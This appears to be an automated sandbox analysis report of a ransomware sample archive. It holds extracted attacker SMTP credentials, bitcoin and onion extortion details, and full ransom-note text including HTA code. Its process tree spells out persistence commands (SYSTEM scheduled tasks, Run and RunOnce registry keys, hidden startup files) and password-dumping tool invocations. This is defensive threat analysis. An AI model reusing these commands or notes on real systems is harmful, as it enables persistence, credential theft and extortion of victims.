Analysis

  • max time kernel
    219s
  • max time network
    245s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-10-2024 16:27

General

  • Target

    RNSM00417.7z

  • Size

    26.6MB

  • MD5

    3827bb44108eb019f3d69ec7c9a4c85b

  • SHA1

    3cc6563e65ff0618cee4bcbb8637db128af32c0a

  • SHA256

    0c05113830f590ea0e628c188bf2b0d9554c6e6bb3bb80178b193caf5bb41c96

  • SHA512

    2e575b82c5f1d25233f5ef8ec2042a54a0b21127e73bea1720e8189f57d709879be7c693456217c8d65bc55ba89e51370c3f3fe603fbd3ff07e247c8da5e6caa

  • SSDEEP

    786432:bFe9AF5zQqfplDfrIxRMmGBN63q8bv5ceUPt/q:bFVpjlDfrIxRMzw3lme

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    smtp.gmail.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    Lolhacker05@!!

Extracted

Path

C:\Users\Admin\Documents\__READ_ME_TO_RECOVER_YOUR_FILES.txt

Ransom Note
Hello, your files were encrypted and are currently unusable. The only way to recover your files is decrypting them with a key that only we have. In order for us to send you the key and the application to decrypt your files, you will have to make a transfer of Bitcoins to an electronic wallet. We leave you here the data to make the bitcoins transfer. Bitcoin wallet: 3QtbAioBSw249J5xsGd1sCqTqhdDX4CD9L Transfer the amount of bitcoins equivalent to 50 USD. Your computer ID is: cca0d105-8260-4611-8c12-bd85a7208b9f Once you make the transfer of bitcoins, send us the transfer ID and your computer ID to our email: [email protected] When we verify the transfer we will send you your key and the decryption application.
Wallets

3QtbAioBSw249J5xsGd1sCqTqhdDX4CD9L

Extracted

Path

C:\Users\Public\WERE_MY _FILES.txt

Family

globeimposter

Ransom Note
All your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: ------------------------------------------------ create a ticket to any of these addresses yip.su/2QstD5 cutt.ly/0htT0he shorturl.at/GOY24 bit.ly/3399Ozf ------------------------------------------------ you can also attach a small cryptted file for a free test decrypt Additional communication method ------------------------------- 1. Download Tor browser - httpps://www.torproject.org/ 2. Install Tor browser 3. Open Tor Browser 4. Open link in TOR browser: http://helpqvrg3cc5mvb3.onion/ -------------------------------- You ID ����������7F 12 CE 5D 0A 64 5C 53 B8 32 0F A1 B8 1A 60 64 30 96 09 04 01 3E 02 5D 8B A4 74 0E 98 2A 92 F5 39 E7 A0 C7 2F F3 3D 3E 08 AD A3 29 54 4D 63 45 CC 7B 33 0E 2A 26 2E 25 A2 5A 01 EB F8 A9 E4 F0 23 2B 1F 51 A1 A4 A7 B4 D2 C1 1F 29 89 C6 36 14 CF 36 CC B5 8F AC E9 16 C8 26 8D 80 62 28 23 D2 84 85 35 F2 86 78 32 EA C1 8E 64 93 8D 74 7B CF 4A 39 46 6C CA 37 AB CD 3D 07 9E 1E 0D 01 11 20 46 44 8D FF 99 C5 C3 33 37 30 83 12 3A 4E CA B4 21 39 2C 1A 02 95 24 8B 3F EE 31 B0 64 8F DD B7 BF E3 C2 87 3F 5A 5C 4E 1B 4B DD 95 7C B2 80 BB E3 C6 E5 68 6C FA D7 8C 60 60 B9 BF 3E 97 8F 1D DB EC D6 89 29 CE 0B 1E 5F 5F A4 4E A0 E5 BC 69 9E 29 6E 17 47 85 EC 06 05 17 C5 04 76 48 BC 94 B2 8B D8 66 F8 0B 8B 7A 7E 34 94 EB 86 BD 1D C7 7F D6 27 E8 69 F6 96 A5 40 51 65 42 39 A6 52 B9 ��������������
URLs

httpps://www.torproject.org/

http://helpqvrg3cc5mvb3.onion/

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\How To Decrypt Files.hta

Ransom Note
<!DOCTYPE HTML><html xmlns:HTA="http://www.w3.org/1999/xhtml " lang="en"><head><title>XINOF v4.4.1</title> <HTA:APPLICATION icon="#" WINDOWSTATE="maximize" SYSMENU="no" singleInstance="yes" contextmenu="no" scroll="yes"/><style type='text/css'>body{font:15px Tahoma,sans-serif;margin:10px;line-height:25px;background:rgb(0,0,0);color:#fff;display:block}a{color:wheat}.mark{background:rgb(189, 54, 54);padding:1px 5px}.header{text-align:center;font-size:53px;line-height:50px;font-weight:bold;color:red;margin-left:80%;padding:30px 0 0 80px}.info{background:rgb(78, 78, 78);border-left:10px solid rgb(59,59,59)}.alert{background:rgb(255, 0, 0);border-left:10px solid rgb(255,0,0)}.note{height:auto;padding-bottom:1px;margin:15px auto}.note .title{font-weight:bold;text-indent:10px;height:30px;line-height:30px;padding-top:10px}.note ul{margin-top:0}.note pre{margin-left:15px;line-height:13px;font-size:13px}#timer{text-align:right;font-size:35px;margin-top:0;color:red;line-height:60px;margin-bottom:0;position:absolute;bottom:0;left:0}.size{position:absolute;bottom:0;right:10px;height:100px;width:250px}#logo{width:15%;height:30%;min-width:15%;min-height:30%;position:absolute;top:10px;left:0}#ico{width:30px;height:30px;position:absolute;bottom:13px;right:5px}@media only screen and (max-width: 1200px){.header{font-size:40px}}</style> <script>var countDownDate=new Date("November 4 2024 16:29").getTime();var x=setInterval(function(){var now=new Date().getTime();var distance=countDownDate-now;var days=Math.floor(distance/(1000*60*60*24));var hours=Math.floor((distance%(1000*60*60*24))/(1000*60*60));var minutes=Math.floor((distance%(1000*60*60))/(1000*60));var seconds=Math.floor((distance%(1000*60))/1000);document.getElementById("timer").innerHTML="0"+days+"d,"+hours+":"+minutes+":"+seconds;if(distance<0){clearInterval(x);document.getElementById("timer").innerHTML="00d,00:00:00";}},1000);</script> </head><body> <br><div class="header note"> All Of Your Files Have Been Encrypted By XINOF!</div> <img id="logo" src="C:\ProgramData\XINOFLOGO.png" alt="logo"><div class="note" style="font-size: 24px;height: 200px;line-height: 33px"><ul style="list-style: none"><li><div style="padding-top: 3%;padding-left: 13%;"> All your files have been encrypted due to a security problem with your PC.<br>If you want to restore them, please send an email to<span class='mark'>[email protected]</span></div></li></ul></div><div class="note" style="position: relative;word-spacing: 5px"><div class="size note"><div style="position: relative;width: 100%;height: 100%"> <img src="C:\ProgramData\XINOFALERT.png" alt="sa" id="ico"><div id="timer"></div></div></div><div class="note"><ul style="list-style: none;font-size: 19px"><li>You have to pay for decryption in Bitcoin. The price depends on how fast you contact us. After payment we will send you the decryption tool.</li><li>You have to 48 hours(2 Day) To contact or paying us After that, you have to Pay <b>Double</b>.</li><li>in case of no answer in 6 hours email us at =<span class='mark'>[email protected]</span></li><li>The crypter person username :<span class='mark'>002enmrs</span></li><li>your SYSTEM ID is :<span class='mark'>F1A57932</span></li></ul></div></div><div class='note alert'><div class='title'> Attention!</div><ul><li><u><b>DO NOT</b> pay any money before decrypting the test files.</u></li><li><u><b>DO NOT</b> trust any intermediary.</u> they wont help you and you may be victim of scam. just email us , we help you in any steps.</li><li><u><b>DO NOT</b> reply to other emails.</u> ONLY this two emails can help you.</li><li>Do not rename encrypted files.</li><li>Do not try to decrypt your data using third party software, it may cause permanent data loss.</li></ul></div><div class='note info'><div class='title'> What is our decryption guarantee?</div><ul><li> Before paying you can send us up to <u>3 test files</u> for free decryption. The total size of files must be less than 2Mb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)</li></ul></div><div class='note alert'><div class='title'>You only have LIMITED time to get back your files!</div><ul><li>if timer runs out and you dont pay us , all of files will be DELETED and yuor hard disk will be seriously DAMAGED.</li><li>you will lose some of your data on day 2 in the timer.</li><li>you can buy more time for pay. Just email us .</li><li>THIS IS NOT A JOKE! you can wait for the timer to run out ,and watch deletion of your files :)</li></ul></div><div><b>Regards-FonixTeam</b></div></body></html>
Emails

class='mark'>[email protected]</span></div></li></ul></div><div

class='mark'>[email protected]</span></li><li>The

Signatures

  • Detect MafiaWare666 ransomware 2 IoCs
  • GlobeImposter

    GlobeImposter is a ransomware first seen in 2017.

  • Globeimposter family
  • Locky

    Ransomware strain released in 2016, with advanced features like anti-analysis.

  • Locky family
  • MafiaWare666 Ransomware

    MafiaWare666 is ransomware written in C# with multiple variants.

  • Mafiaware666 family
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Modiloader family
  • UAC bypass 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • ModiLoader First Stage 1 IoCs
  • Renames multiple (1663) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (9162) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 8 IoCs
  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 2 TTPs 13 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Allows Network login with blank passwords 1 TTPs 2 IoCs

    Allows local user accounts with blank passwords to access device from the network.

  • Checks computer location settings 2 TTPs 12 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 21 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops desktop.ini file(s) 31 IoCs
  • Enumerates connected drives 3 TTPs 54 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

    Possible Turn off User Account Control's privilege elevation for standard users.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 5 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops autorun.inf file 1 TTPs 9 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 39 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 3 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 13 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
    1⤵
    • Executes dropped EXE
    PID:1992
  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00417.7z"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:4248
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2824
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /1
        2⤵
        • Drops startup file
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:4268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3280
        • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe
          HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2460
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c copy "HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe" "C:\Users\Admin\AppData\Local\HostSystem.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:6664
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c, "C:\Users\Admin\AppData\Local\HostSystem.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:7028
            • C:\Users\Admin\AppData\Local\HostSystem.exe
              "C:\Users\Admin\AppData\Local\HostSystem.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:7412
              • C:\Users\Admin\AppData\Local\HostSystem.exe
                "C:\Users\Admin\AppData\Local\HostSystem.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:7696
                • C:\ProgramData\1\1.exe
                  C:\ProgramData\1\1.exe -f "C:\ProgramData\Browsers-Passwords.txt"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:3532
                • C:\ProgramData\1\2.exe
                  C:\ProgramData\1\2.exe -f "C:\ProgramData\FTP-Passwords.txt"
                  7⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:7364
        • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe
          HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe
          3⤵
          • Executes dropped EXE
          • Drops desktop.ini file(s)
          • System Location Discovery: System Language Discovery
          PID:1096
        • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe
          HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          PID:3304
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TIyftrEBuQxce" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD9DC.tmp"
            4⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:6656
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe
            "{path}"
            4⤵
            • Executes dropped EXE
            PID:6784
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe
            "{path}"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:7376
            • C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe
              "C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:6856
            • C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe
              "C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:3320
            • C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe
              "C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:5804
            • C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe
              "C:\Users\Admin\AppData\Local\c89d647e\tor\TORBUILD.exe" -f torrc
              5⤵
                PID:7660
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe
            HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe
            3⤵
            • Modifies WinLogon for persistence
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4712
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c timeout 1
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3224
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                5⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3704
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c timeout 1
              4⤵
              • System Location Discovery: System Language Discovery
              PID:3724
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                5⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:5424
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c timeout 1
              4⤵
              • System Location Discovery: System Language Discovery
              PID:6040
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                5⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:5352
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"
              4⤵
              • Adds Run key to start application
              • Drops desktop.ini file(s)
              • Drops autorun.inf file
              • Drops file in Program Files directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: RenamesItself
              PID:5960
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c del C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe > nul
                5⤵
                • System Location Discovery: System Language Discovery
                PID:3816
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1192
              4⤵
              • Program crash
              PID:5636
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Blocker.gen-977f77728f1783062f8c072096f0b7535ec74f686c3e40db5dc78766edabffeb.exe
            HEUR-Trojan-Ransom.Win32.Blocker.gen-977f77728f1783062f8c072096f0b7535ec74f686c3e40db5dc78766edabffeb.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:3492
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 1264
              4⤵
              • Program crash
              PID:7928
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 1264
              4⤵
              • Program crash
              PID:7576
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exe
            HEUR-Trojan-Ransom.Win32.DoppelPaymer.vho-8971ac708df78f14e3f21c7094d80616195eb46f912cf6d4e72d5eebf9fac865.exe
            3⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            PID:4168
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 252
              4⤵
              • Program crash
              PID:1616
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe
            HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe
            3⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            PID:2384
          • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe
            HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe
            3⤵
            • Executes dropped EXE
            PID:1272
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /C Del /f /q "C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Encoder.vho-bd136b3fde933505cf3740c3800a5007e3a94a2d31f28416b04c212dcb0669b6.exe"
              4⤵
                PID:7592
            • C:\Users\Admin\Desktop\00417\HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe
              HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe
              3⤵
              • Executes dropped EXE
              • Enumerates connected drives
              • Drops file in Program Files directory
              PID:3388
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c chcp 437
                4⤵
                  PID:3244
                  • C:\Windows\system32\chcp.com
                    chcp 437
                    5⤵
                      PID:2292
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F
                    4⤵
                      PID:5520
                      • C:\Windows\system32\schtasks.exe
                        schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /RU SYSTEM /RL HIGHEST /F
                        5⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:5860
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
                      4⤵
                      • Drops startup file
                      PID:5196
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c copy C:\ProgramData\XINOF.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
                      4⤵
                        PID:5504
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F
                        4⤵
                          PID:2480
                          • C:\Windows\system32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\ProgramData\XINOF.exe /F
                            5⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:6020
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
                          4⤵
                          • Hide Artifacts: Hidden Files and Directories
                          PID:6268
                          • C:\Windows\system32\attrib.exe
                            attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XINOF.exe"
                            5⤵
                            • Drops startup file
                            • Views/modifies file attributes
                            PID:7952
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                          4⤵
                            PID:7400
                            • C:\Windows\system32\reg.exe
                              reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                              5⤵
                              • Adds Run key to start application
                              PID:6668
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                            4⤵
                              PID:7232
                              • C:\Windows\system32\reg.exe
                                reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                                5⤵
                                • Adds Run key to start application
                                PID:5828
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                              4⤵
                                PID:6308
                                • C:\Windows\system32\reg.exe
                                  reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                                  5⤵
                                  • Adds Run key to start application
                                  PID:2824
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                                4⤵
                                  PID:7396
                                  • C:\Windows\system32\reg.exe
                                    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "Michael Gillespie" /t REG_SZ /d C:\ProgramData\XINOF.exe /f
                                    5⤵
                                    • Adds Run key to start application
                                    PID:7348
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix11 /TR "HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe" /RU SYSTEM /RL HIGHEST /F
                                  4⤵
                                    PID:6856
